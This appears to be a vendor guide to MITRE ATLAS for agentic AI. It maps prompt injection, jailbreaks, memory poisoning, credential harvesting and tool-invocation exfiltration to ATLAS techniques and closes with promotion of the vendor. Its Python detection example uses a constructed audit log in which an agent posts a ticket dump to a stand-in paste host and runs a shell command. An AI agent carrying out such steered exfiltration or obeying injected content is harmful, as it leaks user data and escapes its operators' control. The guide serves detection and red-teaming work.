MITRE ATLAS for Agentic AI: Mapping Agent and MCP Attacks to the Matrix (2026)
- MITRE ATLAS is a free, community-driven knowledge base of adversary tactics and techniques against AI/ML systems, structured like MITRE ATT&CK: Tactics > Techniques/sub-techniques > Mitigations + Case Studies.
- As of the v5.x releases (late 2025 into 2026) it spans roughly 16 tactics and ~84 techniques, including two AI-specific tactics - AI Model Access and AI Attack Staging - plus a Command and Control tactic added in the November 2025 v5.1.0 release.
- The October 2025 Zenity Labs collaboration added 14 agent-focused techniques covering context/memory poisoning, agent configuration tampering, credential harvesting, and Exfiltration via AI Agent Tool Invocation (AML.T0086).
- ATLAS is the threat side of the house, not the control side - it pairs with NIST AI RMF, OWASP LLM Top 10, and ISO 42001 rather than replacing them.
- Operationalizing ATLAS for agents requires an inventory of every agent and MCP server first, because most Discovery, Credential Access, and Exfiltration techniques assume you already know what exists.
- There is no MCP-named technique yet; MCP risk is covered implicitly through AI Agent Tools, Tool Definitions, and AI Agent Tool Invocation.
MITRE ATLAS is the closest thing the industry has to a shared vocabulary for how adversaries attack AI systems. It is a free, living knowledge base of adversary tactics, techniques, and procedures (TTPs) against AI and machine-learning systems, published by MITRE and built with a community of industry, government, and academic contributors. If you already speak MITRE ATT&CK, you can read ATLAS on day one: it borrows the same matrix structure, the same lifecycle framing, and even most of the same tactic names.
What makes ATLAS urgent in 2026 is its expansion into agentic AI. Through late 2025, ATLAS added a wave of techniques aimed squarely at autonomous agents and the tools they call - context and memory poisoning, agent configuration tampering, credential harvesting, and exfiltration through tool invocation. For any team running AI coding agents, internal copilots, or MCP servers, ATLAS is now the reference that names the attacks you are actually exposed to. This guide walks the framework's real structure, maps it to agent and MCP threats, and shows how a security team operationalizes it.
What MITRE ATLAS is
ATLAS stands for Adversarial Threat Landscape for Artificial-Intelligence Systems. It launched in 2021 and is maintained at atlas.mitre.org as a community-driven, freely available resource. MITRE is a US not-for-profit that also stewards ATT&CK and the CVE program, so ATLAS inherits a credible, vendor-neutral lineage. It is not a standard you certify against and not a control catalog. It is a knowledge base of how AI systems get attacked, intended for threat modeling, red-teaming, and detection engineering.
The defining design choice is that ATLAS is modeled on ATT&CK. That means it is a matrix: columns are Tactics (the adversary's goal), and each column is populated with Techniques and sub-techniques (how the goal is achieved), supported by Mitigations and real-world Case Studies. The tactics are laid out along an attacker lifecycle - reconnaissance through impact - but adversaries can use them in any order or simultaneously. The lifecycle is a reading aid, not a script.
The ATLAS taxonomy in 2026
As of the v5.x releases (the major agentic expansion landed in v5.1.0 in November 2025), ATLAS spans roughly 16 tactics and about 84 techniques, with around 56 sub-techniques, roughly 32 mitigations, and 40-plus case studies. Because it is a living resource, these counts shift release to release - treat them as approximate, not authoritative.
Most tactics are inherited or adapted directly from ATT&CK. Two are AI/ML-specific and are what set ATLAS apart: AI Model Access (gaining access to the model itself, via inference API, the surrounding application, or model artifacts) and AI Attack Staging (preparing an attack against the model - crafting adversarial examples, building surrogate models, poisoning data, inserting backdoors). ATLAS recently renamed many of its older ML labels to AI, so you will see both in older write-ups. A Command and Control tactic was added in the November 2025 release to capture covert control channels, including AI-service-based C2 - exemplified by the SesameOp case study, which abused an LLM provider's assistant API as a covert backdoor.
The tactic set
| Tactic | Origin | Adversary goal |
|---|---|---|
| Reconnaissance | From ATT&CK | Gather information on the AI system, architecture, data sources, and APIs |
| Resource Development | From ATT&CK | Acquire or poison datasets, obtain models and GenAI tools, build infrastructure |
| Initial Access | From ATT&CK | Gain a foothold via malicious APIs, phishing, vulnerabilities, or a compromised ML supply chain |
| AI Model Access | AI-specific | Reach the target model via inference API, the app, or direct artifact access |
| Execution | From ATT&CK | Run adversary-controlled behavior via malicious prompts, unsafe tools, or code paths |
| Persistence | From ATT&CK | Maintain a foothold via poisoned data, backdoored models, or memory manipulation |
| Privilege Escalation | From ATT&CK | Gain higher permissions, e.g. abusing over-permissioned agents or escaping sandboxes |
| Defense Evasion | From ATT&CK | Evade guardrails and filters via prompt obfuscation and anomaly evasion |
| Credential Access | From ATT&CK | Steal credentials from RAG databases or AI agent configuration |
| Discovery | From ATT&CK | Enumerate model info, agent configuration, tools, data sources, and triggers |
| Lateral Movement | From ATT&CK | Pivot through systems reachable from the AI or agent |
| Collection | From ATT&CK | Gather data from AI services, RAG databases, and org documents |
| AI Attack Staging | AI-specific | Prepare the model attack: adversarial examples, proxy models, backdoors |
| Command and Control | From ATT&CK (added Nov 2025) | Covert control channels, including AI-service-based C2 |
| Exfiltration | From ATT&CK | Steal data or model assets, including via agent tool invocation |
| Impact | From ATT&CK | Degrade availability, manipulate outputs, erode integrity, cause harm |
One trap worth flagging: the internal tactic IDs (the AML.TAxxxx numbers) are not in display order. They were assigned in a different sequence than the matrix presents them. Always map your controls and detections to tactics and techniques by name, not by ID number, or you will end up cross-referencing the wrong column.
The generative-AI and agentic techniques that matter
ATLAS now carries a substantial set of GenAI techniques that map cleanly onto LLM-backed applications:
- LLM Prompt Injection (AML.T0051), split into Direct (AML.T0051.000) and Indirect (AML.T0051.001).
- LLM Jailbreak (AML.T0054) - bypassing guardrails so the model acts outside policy.
- LLM Data Leakage (AML.T0057) and Extract LLM System Prompt (AML.T0056).
- RAG Poisoning (AML.T0070), Retrieval Content Crafting (AML.T0066), and LLM Prompt Crafting (AML.T0065).
The October 21, 2025 collaboration between Zenity Labs and MITRE ATLAS added 14 agent-focused techniques and sub-techniques. These are the entries that turn ATLAS from an ML-research framework into something directly usable for agent fleets: AI Agent Context Poisoning, Memory manipulation, Thread injection, Modify AI Agent Configuration, RAG Credential Harvesting, Credentials from AI Agent Configuration, Discover AI Agent Configuration, Embedded Knowledge, Tool Definitions, Activation Triggers, Data from AI Services, RAG Databases, AI Agent Tools, and Exfiltration via AI Agent Tool Invocation (AML.T0086). The hinge technique is AI Agent Tool Invocation (AML.T0053): an agent leveraging its integrated tools is exactly the surface an attacker steers when they win control of the agent's context, and AML.T0086 is the matching Exfiltration technique when those outbound tool calls are used to leak data.
Mapping ATLAS to AI agent and MCP attacks
Agents and MCP servers are where ATLAS gets concrete. An agent is, by design, a system that reads untrusted input and takes real actions through tools - which collapses several tactics into a single workflow. The table below maps the agentic risks we see in the field to ATLAS techniques and to what a security team should watch.
| Agentic / MCP risk | ATLAS tactic → technique | What to monitor |
|---|---|---|
| Over-permissioned agent abused to take action | Execution / Privilege Escalation → AI Agent Tool Invocation (AML.T0053) | Which tools each agent can call, and anomalous tool-call patterns |
| Indirect prompt injection via ingested data | Execution → LLM Prompt Injection Indirect (T0051.001) + Retrieval Content Crafting (T0066) + RAG Poisoning (T0070) | Behavioral deviations after the agent reads external content |
| Direct prompt injection / jailbreak | Execution / Defense Evasion → T0051.000, LLM Jailbreak (T0054) | Out-of-policy actions and guardrail-bypass attempts |
| Persistent agent compromise | Persistence → Context Poisoning, Memory, Thread injection, Prompt Self-Replication (T0061) | Drift in agent behavior over time, via an audit trail |
| Shadow agents and shadow MCP servers | Discovery → Discover AI Agent Configuration, Tool Definitions, Embedded Knowledge, Activation Triggers | A current inventory of every agent and MCP server on the fleet |
| Secrets held in agent or tool config | Credential Access → Credentials from AI Agent Configuration, RAG Credential Harvesting | Agents holding or exposing tool/service API keys |
| Sensitive data exposure | Collection / Exfiltration → LLM Data Leakage (T0057), Extract System Prompt (T0056), Data from AI Services, RAG Databases | Data-exposure events and access to sensitive sources |
| Agent used as an exfiltration channel | Exfiltration → Exfiltration via AI Agent Tool Invocation (AML.T0086) | Outbound tool calls to unexpected destinations |
| Unvetted or malicious MCP server | Initial Access (ML supply chain) / Resource Development / AI Model Access | New, unknown, or unapproved MCP servers appearing on endpoints |
| Covert control via an AI service | Command and Control → SesameOp-style abuse of provider assistant APIs | Agent and MCP traffic to provider control-plane endpoints |
Two gaps are worth naming honestly. First, there is no MCP-named technique in ATLAS as of this writing. The Model Context Protocol risk surface is covered implicitly through AI Agent Tools, Tool Definitions, and Tool Invocation. That is a reasonable abstraction - MCP is one transport for agent tools - but it means an "unvetted MCP server" finding doesn't have a single canonical technique to file under. For deeper treatment of that surface, see our MCP server security guide and our analysis of MCP tool poisoning campaigns.
Second, ATLAS is threat-side only. It tells you what adversaries do; it provides no audit-trail control, no inventory mechanism, and no enforcement of its own. That is by design - it is the complement to control frameworks, not a substitute for them. The full indirect-injection chain (poisoned content → context poisoning → tool invocation → exfiltration) is the canonical multi-stage agent attack; we walk a worked example in our writeup on multi-agent prompt injection and credential theft.
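To make the "What to monitor" column concrete, here is an added example (written for this guide, not tooling from MITRE, Zenity Labs, or any vendor) that runs three detections over a constructed agent audit trail and tags each alert with the ATLAS tactic, technique name, and ID from the mapping table. The tool names, allowlists, and log format are assumptions; the technique IDs are the ones cited above.

```python
import json
from urllib.parse import urlparse

# Constructed sample audit-trail events (one JSON object per line); not real telemetry.
SAMPLE_LOG = """\
{"ts": "2026-01-10T09:00:01Z", "agent": "support-bot", "session": "s1", "tool": "search_kb", "args": {"q": "refund policy"}}
{"ts": "2026-01-10T09:00:05Z", "agent": "support-bot", "session": "s1", "tool": "fetch_url", "args": {"url": "https://partner.example.com/terms"}}
{"ts": "2026-01-10T09:00:09Z", "agent": "support-bot", "session": "s1", "tool": "http_post", "args": {"url": "https://paste.invalid/upload", "body": "ticket dump"}}
{"ts": "2026-01-10T09:01:00Z", "agent": "support-bot", "session": "s2", "tool": "run_shell", "args": {"cmd": "id"}}
{"ts": "2026-01-10T09:02:00Z", "agent": "support-bot", "session": "s3", "tool": "http_post", "args": {"url": "https://crm.example.com/ticket", "body": "ok"}}
"""

# Assumed policy, the output of the inventory step: which tools each agent may call,
# which tools send data out, which tools pull in untrusted content, and approved hosts.
APPROVED_TOOLS = {"support-bot": {"search_kb", "fetch_url", "http_post"}}
OUTBOUND_TOOLS = {"http_post", "send_email"}
INGEST_TOOLS = {"fetch_url", "read_email"}
ALLOWED_HOSTS = {"crm.example.com"}


def detect(log_text):
    """Return alerts, each tagged by ATLAS tactic, technique name and technique ID."""
    alerts = []
    ingested = set()  # sessions in which the agent has already read external content
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ev = json.loads(raw)
        agent, sess, tool = ev["agent"], ev["session"], ev["tool"]

        # Rule 1: a tool call outside the agent's approved set (over-permissioned / steered agent).
        if tool not in APPROVED_TOOLS.get(agent, set()):
            alerts.append({"session": sess, "tactic": "Execution / Privilege Escalation",
                           "technique": "AI Agent Tool Invocation", "technique_id": "AML.T0053",
                           "reason": f"{tool} is not approved for {agent}"})

        if tool in INGEST_TOOLS:
            ingested.add(sess)

        # Rule 2: outbound call to a destination not on the allowlist (exfiltration channel).
        if tool in OUTBOUND_TOOLS:
            host = urlparse(ev["args"].get("url", "")).hostname or ""
            if host not in ALLOWED_HOSTS:
                alerts.append({"session": sess, "tactic": "Exfiltration",
                               "technique": "Exfiltration via AI Agent Tool Invocation",
                               "technique_id": "AML.T0086", "reason": f"outbound to {host}"})
                # Rule 3: the same session read external content first, so the deviation
                # is consistent with indirect prompt injection via ingested data.
                if sess in ingested:
                    alerts.append({"session": sess, "tactic": "Execution",
                                   "technique": "LLM Prompt Injection: Indirect",
                                   "technique_id": "AML.T0051.001",
                                   "reason": "unexpected outbound call after external content was ingested"})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(a["session"], a["technique_id"], a["technique"], "-", a["reason"])
```

On the sample log this yields an AML.T0086 and an AML.T0051.001 alert for session s1 and an AML.T0053 alert for s2, while the approved post in s3 is silent.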
How a security team operationalizes ATLAS
ATLAS is most useful as a coverage map, not a checklist. A practical adoption path for agentic environments looks like this:
- Inventory first. Most Discovery, Credential Access, and Exfiltration techniques assume you already know which agents and MCP servers exist. Build that inventory before anything else - you cannot threat-model assets you cannot see.
- Scope the matrix. You will not be exposed to every technique. Mark which tactics are reachable given your architecture (RAG? autonomous tool use? memory? external MCP servers?) and drop the rest.
- Map detections to techniques by name. For each in-scope technique, ask three questions: is it reachable, is it detectable, is it mitigated? Tag detections and alerts with the technique name and ID so reports trace back to known adversary behavior.
- Anchor red-teaming on ATLAS. Use the technique list to design AI red-team exercises - attempt direct and indirect prompt injection, attempt to read agent configuration, attempt exfiltration via a tool call - and record results against the matrix.
- Cross-walk to your control frameworks. ATLAS techniques map cleanly to the OWASP LLM Top 10, NIST AI RMF, and ISO 42001. Maintain that crosswalk so a single finding feeds both your threat model and your governance reporting.
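The inventory, scoping, and reachable/detectable/mitigated questions above can be kept as one small coverage map. The following is an added example written for this guide (not an artifact from MITRE or any vendor); the agents, their capabilities, and the detection and mitigation registers are constructed, and techniques the article does not give an ID for are keyed by name only, which is also the safe way to key them given the ID-ordering trap noted earlier.

```python
# Technique catalogue used for scoping: (name, ID where this write-up gives one,
# architectural capability that makes the technique reachable). Hand-built for this example.
TECHNIQUES = [
    ("LLM Prompt Injection: Indirect", "AML.T0051.001", "ingests_external_content"),
    ("RAG Poisoning", "AML.T0070", "rag"),
    ("AI Agent Tool Invocation", "AML.T0053", "tool_use"),
    ("Exfiltration via AI Agent Tool Invocation", "AML.T0086", "tool_use"),
    ("Memory manipulation", None, "memory"),
    ("Tool Definitions", None, "external_mcp"),
    ("Credentials from AI Agent Configuration", None, "tool_use"),
]

# Step 1, inventory (constructed): what each agent on the fleet can actually do.
INVENTORY = {
    "support-bot": {"rag", "tool_use", "ingests_external_content"},
    "code-agent": {"tool_use", "memory", "external_mcp"},
}

# Step 3, registers keyed by technique NAME rather than ID.
DETECTIONS = {"AI Agent Tool Invocation", "Exfiltration via AI Agent Tool Invocation"}
MITIGATIONS = {"RAG Poisoning", "AI Agent Tool Invocation"}


def coverage(inventory=INVENTORY):
    """Step 2 and 3: for every technique, is it reachable, detectable, mitigated, and by which agents?"""
    rows = []
    for name, tid, prereq in TECHNIQUES:
        reachable_by = sorted(agent for agent, caps in inventory.items() if prereq in caps)
        rows.append({
            "technique": name,
            "id": tid or "(no ID given in this write-up)",
            "reachable": bool(reachable_by),
            "agents": reachable_by,
            "detectable": name in DETECTIONS,
            "mitigated": name in MITIGATIONS,
        })
    return rows


def gaps(rows):
    """Step 4 input: reachable techniques lacking a detection or a mitigation become the red-team backlog."""
    return [r["technique"] for r in rows
            if r["reachable"] and not (r["detectable"] and r["mitigated"])]


if __name__ == "__main__":
    for r in coverage():
        flags = "R" if r["reachable"] else "-", "D" if r["detectable"] else "-", "M" if r["mitigated"] else "-"
        print("".join(flags), r["id"], r["technique"], r["agents"])
    print("backlog:", gaps(coverage()))
```

Techniques whose prerequisite no agent has fall out of scope automatically, so adding or removing an agent from the inventory re-scopes the matrix without touching the technique catalogue.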
For organizations standardizing on AI coding assistants, the same matrix drives concrete policy. Direct and indirect prompt injection, credential harvesting from config files, and tool invocation are everyday risks for CLIs and IDE agents - see securing AI coding agents and CLIs and governing AI coding assistants across your fleet for how those map to day-to-day controls.
Where continuous agent and MCP visibility fits
Walk the agentic rows of the mapping table and a pattern emerges: nearly every detection presupposes that you already know what agents and MCP servers exist, what tools they can call, and what they normally do. The Discovery tactic - Discover AI Agent Configuration, Tool Definitions, Activation Triggers - is literally the adversary doing reconnaissance on assets most organizations have never inventoried. If the attacker can enumerate your agents and you cannot, the asymmetry is already lost.
This is the layer continuous agent and MCP visibility addresses, and it is the category Anomity works in. Discovering and inventorying every AI agent and MCP server on the fleet is the control that answers the Discovery tactic and the "unvetted MCP server" gap ATLAS only covers implicitly. Monitoring agent permissions and tool definitions maps to Credential Access and AI Agent Tool Invocation. Behavioral anomaly alerts surface the indirect-injection chain, and a per-agent audit trail is the evidence layer that lets a SOC attribute observed behavior to a specific ATLAS technique or case study - something the framework, being threat-side, deliberately leaves to tooling. ATLAS names the threats; visibility is what makes them detectable in your environment.
If your agent estate has grown faster than your inventory - the common case - the practical starting point is the same as step one above: find out what is actually running. Our field notes on what we find when we scan AI agent configs and why AI agents and MCP servers are the new shadow IT cover what that discovery surfaces in practice.
Bottom line
MITRE ATLAS has matured from an ML-research curiosity into the de facto threat reference for AI systems, and its 2025-2026 agentic expansion makes it directly relevant to anyone running agents or MCP servers. Use it as your shared language for AI threats, cross-walk it to your control frameworks rather than treating it as one, and remember its core assumption: you can only map, detect, and mitigate the agents you can see. Inventory and visibility come first; the matrix does the rest.
Frequently asked questions
What is MITRE ATLAS?
MITRE ATLAS (Adversarial Threat Landscape for Artificial-Intelligence Systems) is a free, living knowledge base of adversary tactics, techniques, and procedures against AI and machine-learning systems. It is published by MITRE and built with a community of industry, government, and academic contributors. Launched in 2021, it is deliberately modeled on MITRE ATT&CK and available at atlas.mitre.org.
How is MITRE ATLAS different from MITRE ATT&CK?
ATLAS reuses ATT&CK's matrix structure (Tactics > Techniques > Mitigations + Case Studies) but focuses on AI/ML systems. Most tactics are inherited from ATT&CK, but two are AI-specific: AI Model Access and AI Attack Staging. ATLAS also adds AI-native techniques such as prompt injection, jailbreaks, RAG poisoning, and agent tool invocation that have no equivalent in classic ATT&CK.
How many tactics and techniques are in MITRE ATLAS?
As of the v5.x releases in late 2025 and 2026, ATLAS spans roughly 16 tactics and about 84 techniques (with around 56 sub-techniques), about 32 mitigations, and 40-plus real-world case studies. Because ATLAS is a living resource, exact counts shift from release to release, so treat these as approximate.
Does MITRE ATLAS cover AI agents and MCP servers?
Yes, increasingly so. The October 2025 Zenity Labs collaboration added 14 agent-focused techniques covering context and memory poisoning, agent configuration tampering, credential harvesting, tool discovery, and exfiltration via tool invocation. There is no technique named for the Model Context Protocol specifically; MCP risk is covered implicitly through AI Agent Tools, Tool Definitions, and AI Agent Tool Invocation.
What is AI Agent Tool Invocation in ATLAS?
AI Agent Tool Invocation (AML.T0053) describes an adversary using access to an agent to make it invoke the tools it is connected to. It maps to the Execution and Privilege Escalation tactics and is the core agentic risk surface: an attacker who steers an over-permissioned agent can make it invoke real tools and APIs. A related but distinct technique, Exfiltration via AI Agent Tool Invocation (AML.T0086), covers using the agent's outbound tool calls as a data-exfiltration channel.
Does MITRE ATLAS replace NIST AI RMF or OWASP LLM Top 10?
No. ATLAS is threat-side: it catalogs how adversaries attack AI systems. NIST AI RMF and ISO 42001 are control- and governance-side frameworks, and the OWASP LLM Top 10 is a risk list. They are complementary, and ATLAS techniques are widely cross-walked to all three for threat modeling and red-teaming.
How do I use MITRE ATLAS for AI red teaming?
Use the matrix as a coverage map. Build an inventory of your AI systems, agents, and MCP servers, then walk each ATLAS tactic and ask whether the relevant techniques are reachable, detectable, and mitigated in your environment. Map findings to specific technique IDs and case studies so detections and reports are traceable to known adversary behavior.